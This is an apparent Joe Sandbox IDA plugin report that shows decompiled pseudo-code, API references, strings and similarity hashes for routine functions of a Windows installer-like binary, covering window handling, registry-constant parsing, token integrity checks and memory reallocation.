Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorLast
String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
API String ID: 1452528299-3038984924
Opcode ID: 93f7f7ee3fbe46887396e0d59efa9c6872d48ff1b9f9f5449602dbfd64fe8072
Instruction ID: d4ac74669b66db6e3c059ab59b5fef26885b757fb78d8d61fce7d85db13fc410
Opcode Fuzzy Hash: 93f7f7ee3fbe46887396e0d59efa9c6872d48ff1b9f9f5449602dbfd64fe8072
Instruction Fuzzy Hash: 0E014834E0824856CF14D7DDA0512DDB7B49F49304F54C6FBA495D7242DA79050DCB9B

Uniqueness

Uniqueness Score: -1.00%

Function 0047B374 Relevance: 6.0, APIs: 4, Instructions: 35
sleepCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0047B374(intOrPtr __eax, void* __ecx, void* __edx, void* __eflags) {
				signed int _t3;
				long _t7;
				signed int _t11;
				void* _t16;
				void* _t17;
				intOrPtr* _t18;

				_t19 = __eflags;
				_push(__ecx);
				_t16 = __ecx;
				_t17 = __edx;
				 *_t18 = __eax;
				while(1) {
					_t3 = E00451C68( *_t18, _t17, _t19);
					asm("sbb ebx, ebx");
					_t11 =  ~( ~_t3);
					if(_t11 != 0 || GetLastError() == 2 || GetLastError() == 3) {
						break;
					}
					_t7 = GetTickCount();
					_t19 = _t7 - _t16 - 0x7d0;
					if(_t7 - _t16 < 0x7d0) {
						Sleep(0x32);
						continue;
					}
					break;
				}
				return _t11;
			}

0x0047b374
0x0047b377
0x0047b378
0x0047b37a
0x0047b37c
0x0047b37f
0x0047b384
0x0047b38d
0x0047b38f
0x0047b393
0x00000000
0x00000000
0x0047b3a9
0x0047b3b0
0x0047b3b5
0x0047b3b9
0x00000000
0x0047b3b9
0x00000000
0x0047b3b5
0x0047b3c6

APIs

GetLastError.KERNEL32 ref: 0047B395
GetLastError.KERNEL32 ref: 0047B39F
GetTickCount.KERNEL32 ref: 0047B3A9
Sleep.KERNEL32(00000032), ref: 0047B3B9

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorLast$CountSleepTick
String ID:
API String ID: 2227064392-0
Opcode ID: e62ba75070e330dd4ffde4dc999d4f715340779e27749b10ef8fd6c78c3d8413
Instruction ID: 8bf1b0c6a29e74397e498c90e44f40b2af047c46d630712a340a284ff5036f8c
Opcode Fuzzy Hash: e62ba75070e330dd4ffde4dc999d4f715340779e27749b10ef8fd6c78c3d8413
Instruction Fuzzy Hash: 2EE02B3130998495CA2235FE18C67BF458CCF86364F14653FF88CDA2C2C51C4C4985AE

Uniqueness

Uniqueness Score: -1.00%

Function 00476924 Relevance: 6.0, APIs: 4, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00476924() {
				long _v8;
				void _v12;
				void* _v16;
				void* _t16;
				HANDLE* _t17;

				_t17 =  &_v12;
				_t16 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 8, _t17) != 0) {
					_v12 = 0;
					if(GetTokenInformation(_v16, 0x12,  &_v12, 4,  &_v8) != 0) {
						_t16 = _v16;
					}
					CloseHandle( *_t17);
				}
				return _t16;
			}

0x00476925
0x00476928
0x0047693a
0x0047693e
0x0047695c
0x0047695e
0x0047695e
0x00476966
0x00476966
0x00476971

APIs

GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,0047F4AB,?,?,?,?,?,00496FD2,00000000), ref: 0047692D
OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F4AB,?,?,?,?,?,00496FD2), ref: 00476933
GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F4AB), ref: 00476955
CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F4AB), ref: 00476966

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ProcessToken$CloseCurrentHandleInformationOpen
String ID:
API String ID: 215268677-0
Opcode ID: 6638d2616fdc4babfde8a22db633763a8ab16e525989c2c1e51a975794de3396
Instruction ID: 27bd0ef3eb54f5e8884fa922feac968426520882f0bbce2df0076db31bc8e5d6
Opcode Fuzzy Hash: 6638d2616fdc4babfde8a22db633763a8ab16e525989c2c1e51a975794de3396
Instruction Fuzzy Hash: 92F030A1644701ABD600EAB5CC82E9B77DCEB44754F04893A7E98D72C1D678DC18AB26

Uniqueness

Uniqueness Score: -1.00%

Function 00424228 Relevance: 6.0, APIs: 4, Instructions: 26
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00424228(void* __eax) {
				struct HWND__* _t4;
				void* _t6;
				struct HWND__* _t7;

				_t6 = __eax;
				_t4 =  *(__eax + 0x20);
				if(_t4 != 0) {
					_t4 = GetLastActivePopup(_t4);
					_t7 = _t4;
					if(_t7 != 0 && _t7 !=  *((intOrPtr*)(_t6 + 0x20))) {
						_t4 = IsWindowVisible(_t7);
						if(_t4 != 0) {
							_t4 = IsWindowEnabled(_t7);
							if(_t4 != 0) {
								return SetForegroundWindow(_t7);
							}
						}
					}
				}
				return _t4;
			}

0x0042422a
0x0042422c
0x00424231
0x00424234
0x00424239
0x0042423d
0x00424245
0x0042424c
0x0042424f
0x00424256
0x00000000
0x00424259
0x00424256
0x0042424c
0x0042423d
0x00424260

APIs

GetLastActivePopup.USER32(?), ref: 00424234
IsWindowVisible.USER32(?), ref: 00424245
IsWindowEnabled.USER32(?), ref: 0042424F
SetForegroundWindow.USER32(?,?,?,?,?,004917B0,00000000,00491FA1), ref: 00424259

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$ActiveEnabledForegroundLastPopupVisible
String ID:
API String ID: 2280970139-0
Opcode ID: 82b6da80a40c4c1c4bf04df77498b935b9686ebc6b89ac6962e6542017b5bce5
Instruction ID: 2a7e14987d27369ef8710af098a3b5809c63b96fec088f20efa1dfba1a38df21
Opcode Fuzzy Hash: 82b6da80a40c4c1c4bf04df77498b935b9686ebc6b89ac6962e6542017b5bce5
Instruction Fuzzy Hash: B2E08691702535939E25772719C1A9B028CCDC53D434601A7BE24F7243DB1DCC0181BC

Uniqueness

Uniqueness Score: -1.00%

Function 00406284 Relevance: 6.0, APIs: 4, Instructions: 11
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406284(void* __eax, int __ecx, long __edx) {
				void* _t2;
				void* _t4;

				_t2 = GlobalHandle(__eax);
				GlobalUnWire(_t2);
				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
				GlobalFix(_t4);
				return _t4;
			}

0x00406287
0x0040628e
0x00406293
0x00406299
0x0040629e

APIs

GlobalHandle.KERNEL32 ref: 00406287
GlobalUnWire.KERNEL32(00000000), ref: 0040628E
GlobalReAlloc.KERNEL32 ref: 00406293
GlobalFix.KERNEL32(00000000), ref: 00406299

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Global$AllocHandleWire
String ID:
API String ID: 2210401237-0
Opcode ID: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
Instruction ID: ad050c8fb554795a0ca7e59246f03ac17dd57b6c6051e6027a9978793207e39e
Opcode Fuzzy Hash: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
Instruction Fuzzy Hash: A0B009C5814A05B9EC0833B24C0BD3F141CD88072C3808A6FB458BA1839C7C9C402A3D

Uniqueness

Uniqueness Score: -1.00%

Function 00469C44 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 259
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00469C44(intOrPtr __eax, void* __ecx, intOrPtr __edx, void* __eflags, void* __fp0) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t132;
				intOrPtr _t152;
				intOrPtr _t173;
				void* _t183;
				void* _t211;
				void* _t216;
				void* _t217;
				int _t218;
				void* _t220;
				int _t232;
				intOrPtr _t236;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t241;
				intOrPtr _t242;
				intOrPtr _t245;
				intOrPtr _t246;
				intOrPtr _t247;
				signed int _t248;
				int _t252;
				char _t253;
				void* _t257;
				void* _t258;
				intOrPtr _t260;
				void* _t282;

				_t282 = __fp0;
				_t220 = __ecx;
				_t256 = __edx;
				_v8 = __eax;
				_t258 = E00467F4C(_v8, _t216, __edx, __edx, _t257);
				_t217 = E0040B424( *((intOrPtr*)(_v8 + 0x2f8)), _t258);
				 *((intOrPtr*)(_v8 + 0x340)) = __edx;
				_t102 =  *((intOrPtr*)(_t217 + 0x28));
				if( *((intOrPtr*)(_t217 + 0x28)) != 0) {
					E00464670( *((intOrPtr*)(_v8 + 0x1c8)), _t220, _t102);
				}
				E00464670( *((intOrPtr*)(_v8 + 0x1c4)), _t220,  *((intOrPtr*)(_t217 + 0x24)));
				E00466410(_t217);
				if( *0x49ac44 == 0) {
					L5:
					_t232 = 0;
					goto L7;
				} else {
					_t211 =  *((intOrPtr*)(_v8 + 0x340)) - 1;
					if(_t211 == 0 || _t211 == 0xd) {
						goto L5;
					} else {
						_t232 = 1;
						L7:
						E00414A2C( *((intOrPtr*)(_v8 + 0x284)), _t220, _t232, _t256);
						if(( *(_t217 + 0x5c) & 0x00000002) != 0) {
							E00414A2C( *((intOrPtr*)(_v8 + 0x1c0)), _t220, 0, _t256);
							E00414A2C( *((intOrPtr*)(_v8 + 0x1bc)), _t220, 0, _t256);
							_t235 = 0;
							__eflags = 0;
							E00414A2C( *((intOrPtr*)(_v8 + 0x1b8)), _t220, 0, _t256);
						} else {
							_t173 = _v8;
							_t267 =  *((intOrPtr*)(_t173 + 0x340)) - 0xc;
							if( *((intOrPtr*)(_t173 + 0x340)) == 0xc || E00469BF8(_v8, _t267, _t282) + 1 == 0) {
								_t248 = 0;
							} else {
								_t248 = 1;
							}
							E00414A2C( *((intOrPtr*)(_v8 + 0x1c0)), _t220, _t248, _t256);
							E00414A2C( *((intOrPtr*)(_v8 + 0x1bc)), _t220, _t248 & 0xffffff00 |  *((intOrPtr*)(_v8 + 0x340)) != 0x0000000c, _t256);
							_t183 =  *((intOrPtr*)(_v8 + 0x340)) - 2;
							if(_t183 == 0) {
								E00414A68( *((intOrPtr*)(_v8 + 0x1bc)),  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x2a4)) + 0x101)));
							} else {
								if(_t183 == 9) {
									_t253 =  *0x49b376; // 0x0
									E00414A68( *((intOrPtr*)(_v8 + 0x1bc)), _t253);
								} else {
									E00414A68( *((intOrPtr*)(_v8 + 0x1bc)), 1);
								}
							}
							if(_t258 > E00467F4C(_v8, _t217, 0xc, _t256, _t258) ||  *((intOrPtr*)(_v8 + 0x340)) == 0xb &&  *0x49b376 != 0) {
								_t252 = 0;
							} else {
								_t252 = 1;
							}
							E00414A2C( *((intOrPtr*)(_v8 + 0x1b8)), _t220, _t252, _t256);
							if( *((intOrPtr*)(_v8 + 0x340)) != 0xc || ( *0x49b29e & 0x00000002) != 0 &&  *0x49b0bc == 0) {
								_t235 = 1;
							} else {
								_t235 = 0;
							}
							E00414A68( *((intOrPtr*)(_v8 + 0x1b8)), _t235);
						}
						if(E00418138( *((intOrPtr*)(_v8 + 0x1b8)), _t235) == 0) {
							_t218 = 1;
						} else {
							_t218 = 0;
						}
						_t219 = _t218;
						EnableMenuItem(GetSystemMenu(E004181C8(_v8), 0), 0xf060, _t218);
						_t236 =  *0x49ac50; // 0x227c640
						E00414B00( *((intOrPtr*)(_v8 + 0x1c0)), _t218, _t236, _t256, _t258);
						if( *((intOrPtr*)(_v8 + 0x340)) != 0xa) {
							_t132 =  *((intOrPtr*)(_v8 + 0x340));
							__eflags = _t132 - 0xb;
							if(_t132 != 0xb) {
								L37:
								__eflags = _t132 - 0xe;
								if(_t132 != 0xe) {
									_t237 =  *0x49ac68; // 0x227c6cc
									E00414B00( *((intOrPtr*)(_v8 + 0x1bc)), _t219, _t237, _t256, _t258);
									_t238 =  *0x49ac58; // 0x227c66c
									E00414B00( *((intOrPtr*)(_v8 + 0x1b8)), _t219, _t238, _t256, _t258);
									goto L40;
								}
								L38:
								_t246 =  *0x49ac5c; // 0x227c680
								E00414B00( *((intOrPtr*)(_v8 + 0x1bc)), _t219, _t246, _t256, _t258);
								_t238 =  *0x49ac58; // 0x227c66c
								E00414B00( *((intOrPtr*)(_v8 + 0x1b8)), _t219, _t238, _t256, _t258);
								goto L40;
							}
							__eflags =  *0x49b376;
							if( *0x49b376 != 0) {
								goto L38;
							}
							goto L37;
						} else {
							_t247 =  *0x49ac60; // 0x227c694
							E00414B00( *((intOrPtr*)(_v8 + 0x1bc)), _t219, _t247, _t256, _t258);
							_t238 =  *0x49ac58; // 0x227c66c
							E00414B00( *((intOrPtr*)(_v8 + 0x1b8)), _t219, _t238, _t256, _t258);
							L40:
							E00469B8C(_v8, _t220, _t238, _t256);
							if( *((intOrPtr*)(_v8 + 0x340)) == 5) {
								_push(0x469f56);
								_push( *[fs:eax]);
								 *[fs:eax] = _t260;
								E00414A68( *((intOrPtr*)(_v8 + 0x1bc)), E00465EE0(_v8, _t219, _t256, _t258, _t282));
								_pop(_t245);
								 *[fs:eax] = _t245;
							}
							_push(_t259);
							_push(0x469fab);
							_push( *[fs:eax]);
							 *[fs:eax] = _t260;
							 *((intOrPtr*)( *((intOrPtr*)(E00468010(_v8,  *((intOrPtr*)(_v8 + 0x340)), _t256))) + 0x28))();
							_pop(_t241);
							 *[fs:eax] = _t241;
							_push(_t259);
							_push(0x46a009);
							_push( *[fs:eax]);
							 *[fs:eax] = _t260;
							_t281 =  *0x49b3b8;
							if( *0x49b3b8 != 0) {
								_v16 =  *((intOrPtr*)(_v8 + 0x340));
								_v12 = 0;
								_t152 =  *0x49b3b8; // 0x22901cc
								E00492F08(_t152,  &_v16, "CurPageChanged", _t281, _t282, 0, 0);
							}
							_pop(_t242);
							 *[fs:eax] = _t242;
							return 0;
						}
					}
				}
			}

0x00469c44
0x00469c44
0x00469c4d
0x00469c4f
0x00469c5c
0x00469c6e
0x00469c73
0x00469c79
0x00469c7e
0x00469c8b
0x00469c8b
0x00469c9c
0x00469ca3
0x00469caf
0x00469cc4
0x00469cc4
0x00000000
0x00469cb1
0x00469cba
0x00469cbd
0x00000000
0x00469cc8
0x00469cc8
0x00469cca
0x00469cd3
0x00469cdc
0x00469dfb
0x00469e0b
0x00469e10
0x00469e10
0x00469e1b
0x00469ce2
0x00469ce2
0x00469ce5
0x00469cec
0x00469cf9
0x00469cfd
0x00469cfd
0x00469cfd
0x00469d08
0x00469d23
0x00469d31
0x00469d34
0x00469d55
0x00469d36
0x00469d39
0x00469d5c
0x00469d6b
0x00469d3b
0x00469d7d
0x00469d7d
0x00469d39
0x00469d91
0x00469da8
0x00469dac
0x00469dac
0x00469dac
0x00469db7
0x00469dc6
0x00469dde
0x00469dda
0x00469dda
0x00469dda
0x00469de9
0x00469de9
0x00469e30
0x00469e36
0x00469e32
0x00469e32
0x00469e32
0x00469e3b
0x00469e55
0x00469e5a
0x00469e69
0x00469e78
0x00469ea7
0x00469ead
0x00469eb0
0x00469ebb
0x00469ebb
0x00469ebe
0x00469eea
0x00469ef9
0x00469efe
0x00469f0d
0x00000000
0x00469f0d
0x00469ec0
0x00469ec0
0x00469ecf
0x00469ed4
0x00469ee3
0x00000000
0x00469ee3
0x00469eb2
0x00469eb9
0x00000000
0x00000000
0x00000000
0x00469e7a
0x00469e7a
0x00469e89
0x00469e8e
0x00469e9d
0x00469f12
0x00469f15
0x00469f24
0x00469f29
0x00469f2e
0x00469f31
0x00469f47
0x00469f4e
0x00469f51
0x00469f51
0x00469f7f
0x00469f80
0x00469f85
0x00469f88
0x00469f9e
0x00469fa3
0x00469fa6
0x00469fc4
0x00469fc5
0x00469fca
0x00469fcd
0x00469fd0
0x00469fd7
0x00469fe6
0x00469fe9
0x00469ff5
0x00469ffa
0x00469ffa
0x0046a001
0x0046a004
0x00000000
0x0046a004
0x00469e78
0x00469cbd

APIs

GetSystemMenu.USER32(00000000,00000000,0000F060,00000001), ref: 00469E4F
EnableMenuItem.USER32 ref: 00469E55

Strings

CurPageChanged, xrefs: 00469FF0

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Menu$EnableItemSystem
String ID: CurPageChanged
API String ID: 3692539535-2490978513
Opcode ID: b65055678c82c029c01af9c121489853940d0321d4b4b40768fc13f103f5da2c
Instruction ID: f1e669c9fe2375b542d712c7743f0cf24833e96c781f245e4a8257aed6fc37ff
Opcode Fuzzy Hash: b65055678c82c029c01af9c121489853940d0321d4b4b40768fc13f103f5da2c
Instruction Fuzzy Hash: 08B13934604204DFCB11DB69D985EE973F9EF85304F2640B6F8049B362DB79AE41DB4A

Uniqueness

Uniqueness Score: -1.00%

Function 00478A8C Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 210
registryCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00478A8C(char __eax, intOrPtr* __ebx, intOrPtr __edx, char __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v29;
				intOrPtr _v36;
				void* _v40;
				char _v44;
				char _t104;
				char _t164;
				char _t165;
				void* _t174;
				intOrPtr _t194;
				void* _t217;
				void* _t218;
				void* _t222;
				void* _t236;
				void* _t240;

				_t215 = __edi;
				_t173 = __ebx;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v44 = 0;
				_v16 = 0;
				_v20 = 0;
				_v24 = 0;
				_v28 = 0;
				_v12 = __edx;
				_v8 = __eax;
				E00403728(_v8);
				_push(_t222);
				_push(0x478d29);
				_push( *[fs:eax]);
				 *[fs:eax] = _t222 + 0xffffffd8;
				E004037B8( &_v8, 4, 1);
				_t217 = E0042D784(0x5c, 4, _v8);
				if(_t217 == 0) {
					L24:
					E004526A4("Failed to parse \"reg\" constant", _t173, _t215, _t217, _t236);
					L25:
					_pop(_t194);
					 *[fs:eax] = _t194;
					_push(E00478D30);
					E00403400( &_v44);
					E00403420( &_v28, 4);
					return E00403400( &_v8);
				}
				E00403778(_v8, _t217 - 1, 1,  &_v16);
				if(_v16 == 0) {
					goto L24;
				} else {
					_t104 =  *0x498c3c; // 0x1
					_v29 = _t104;
					_t174 = E00403574(_v16);
					if(_t174 >= 2) {
						if( *((char*)(_v16 + _t174 - 2)) != 0x33 ||  *((char*)(_v16 + _t174 - 1)) != 0x32) {
							_t164 = _v16;
							__eflags =  *((char*)(_t164 + _t174 - 2)) - 0x36;
							if( *((char*)(_t164 + _t174 - 2)) == 0x36) {
								_t165 = _v16;
								__eflags =  *((char*)(_t165 + _t174 - 1)) - 0x34;
								if( *((char*)(_t165 + _t174 - 1)) == 0x34) {
									__eflags =  *0x49b370;
									if(__eflags == 0) {
										E004526A4("Cannot access a 64-bit key in a \"reg\" constant on this version of Windows", _t174, _t215, _t217, __eflags);
									}
									_v29 = 2;
									__eflags = _t174 - 2;
									E004038A4( &_v16, _t174 - 2);
								}
							}
						} else {
							_v29 = 1;
							E004038A4( &_v16, _t174 - 2);
						}
					}
					_v36 = 0;
					_t215 = 5;
					_t173 = 0x498c4c;
					while(E00406AA4( *_t173, _v16) != 0) {
						_t173 = _t173 + 8;
						_t215 = _t215 - 1;
						__eflags = _t215;
						if(__eflags != 0) {
							continue;
						}
						L15:
						if(_v36 == 0) {
							goto L24;
						}
						_t38 = _t217 + 1; // 0x1
						E00403778(_v8, 0x7fffffff, _t38,  &_v16);
						_t218 = E0042D784(0x7c, 0x7fffffff, _v16);
						if(_t218 == 0) {
							_t218 = E00403574(_v16) + 1;
						}
						_t43 = _t218 + 1; // 0x2
						E00403778(_v16, 0x7fffffff, _t43,  &_v28);
						E004038A4( &_v16, _t218 - 1);
						_t217 = E0042D784(0x2c, 0x7fffffff, _v16);
						if(_t217 == 0) {
							goto L24;
						} else {
							E00403778(_v16, _t217 - 1, 1,  &_v20);
							_t50 = _t217 + 1; // 0x1
							E00403778(_v16, 0x7fffffff, _t50,  &_v24);
							E0042D680( &_v20, _t173, _t215, _t217);
							_t236 = 0x2c;
							if(0x2c == 0) {
								goto L24;
							}
							E0042D680( &_v24, _t173, _t215, _t217);
							_t236 = 0x2c;
							if(0x2c == 0 || E0042D680( &_v28, _t173, _t215, _t217) == 0) {
								goto L24;
							} else {
								E0047AA20(_v28, _t173,  *((intOrPtr*)(_a4 - 8)),  *((intOrPtr*)(_a4 - 4)), _t215, _t217, _t240, _v12);
								E0047AA20(_v20, _t173,  *((intOrPtr*)(_a4 - 8)),  *((intOrPtr*)(_a4 - 4)), _t215, _t217, _t240,  &_v44);
								if(E0042DD1C(_v29, E00403738(_v44), _v36,  &_v40, 1, 0) == 0) {
									E0047AA20(_v24, _t173,  *((intOrPtr*)(_a4 - 8)),  *((intOrPtr*)(_a4 - 4)), _t215, _t217, _t240,  &_v44);
									E00403738(_v44);
									E0042DC4C();
									RegCloseKey(_v40);
								}
								goto L25;
							}
						}
					}
					_t34 = _t173 + 4; // 0x80000000
					_v36 =  *_t34;
					goto L15;
				}
			}

0x00478a8c
0x00478a8c
0x00478a92
0x00478a93
0x00478a94
0x00478a97
0x00478a9a
0x00478a9d
0x00478aa0
0x00478aa3
0x00478aa6
0x00478aa9
0x00478aaf
0x00478ab6
0x00478ab7
0x00478abc
0x00478abf
0x00478acf
0x00478ade
0x00478ae2
0x00478cf4
0x00478cf9
0x00478cfe
0x00478d00
0x00478d03
0x00478d06
0x00478d0e
0x00478d1b
0x00478d28
0x00478d28
0x00478af7
0x00478b00
0x00000000
0x00478b06
0x00478b06
0x00478b0b
0x00478b16
0x00478b1b
0x00478b25
0x00478b44
0x00478b47
0x00478b4c
0x00478b4e
0x00478b51
0x00478b56
0x00478b58
0x00478b5f
0x00478b66
0x00478b66
0x00478b6b
0x00478b71
0x00478b77
0x00478b77
0x00478b56
0x00478b31
0x00478b31
0x00478b3d
0x00478b3d
0x00478b25
0x00478b7e
0x00478b81
0x00478b86
0x00478b8b
0x00478ba1
0x00478ba4
0x00478ba4
0x00478ba5
0x00000000
0x00000000
0x00478ba7
0x00478bab
0x00000000
0x00000000
0x00478bb5
0x00478bc0
0x00478bcf
0x00478bd3
0x00478bdf
0x00478bdf
0x00478be4
0x00478bef
0x00478bfa
0x00478c09
0x00478c0d
0x00000000
0x00478c13
0x00478c22
0x00478c2b
0x00478c36
0x00478c3e
0x00478c43
0x00478c45
0x00000000
0x00000000
0x00478c4e
0x00478c53
0x00478c55
0x00000000
0x00478c6b
0x00478c7e
0x00478c9e
0x00478cba
0x00478ccf
0x00478cd7
0x00478ce4
0x00478ced
0x00478ced
0x00000000
0x00478cba
0x00478c55
0x00478c0d
0x00478b99
0x00478b9c
0x00000000
0x00478b9c

APIs

RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047A2FD,?,00000000,00000000,00000001,00000000,00478D29,?,00000000), ref: 00478CED

Strings

Failed to parse "reg" constant, xrefs: 00478CF4
Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 00478B61

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Close
String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
API String ID: 3535843008-1938159461
Opcode ID: 07bf0a71d9d563af8cb629409e8f260d9455bbbb5403baebb8d212675b6d23ff
Instruction ID: 80855d84898bfaddbb6886241cdf265d67617a304eb8fc684ca52e8f7352bdc5
Opcode Fuzzy Hash: 07bf0a71d9d563af8cb629409e8f260d9455bbbb5403baebb8d212675b6d23ff
Instruction Fuzzy Hash: 69814275E00148AFCB11DF95C585ADEBBF9AF48314F10817AF815AB391DB38AE05CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00481500 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00481500(intOrPtr __eax, void* __ebx, char __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _t20;
				void* _t21;
				intOrPtr _t25;
				char _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t40;
				intOrPtr _t43;
				void* _t47;
				intOrPtr _t48;
				intOrPtr _t53;
				intOrPtr _t55;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t77;
				intOrPtr _t78;

				_t75 = __esi;
				_t74 = __edi;
				_t60 = __ecx;
				_t77 = _t78;
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v8 = __eax;
				_push(_t77);
				_push(0x4816c9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t78;
				_push(_t77);
				_push(0x481688);
				_push( *[fs:eax]);
				 *[fs:eax] = _t78;
				_t20 =  *0x49b048; // 0x22877c0
				_t21 = E004181C8(_t20);
				_t59 = _t21;
				if(_t21 == GetForegroundWindow()) {
					_t55 =  *0x49a628; // 0x2262410
					SetActiveWindow( *(_t55 + 0x20));
				}
				E00422DE4();
				if( *0x49b376 != 0) {
					__eflags =  *0x49b0d4;
					if( *0x49b0d4 != 0) {
						_t53 =  *0x49b0d4; // 0x0
						 *0x49b3b0 = _t53;
					}
					__eflags =  *0x49b0bb;
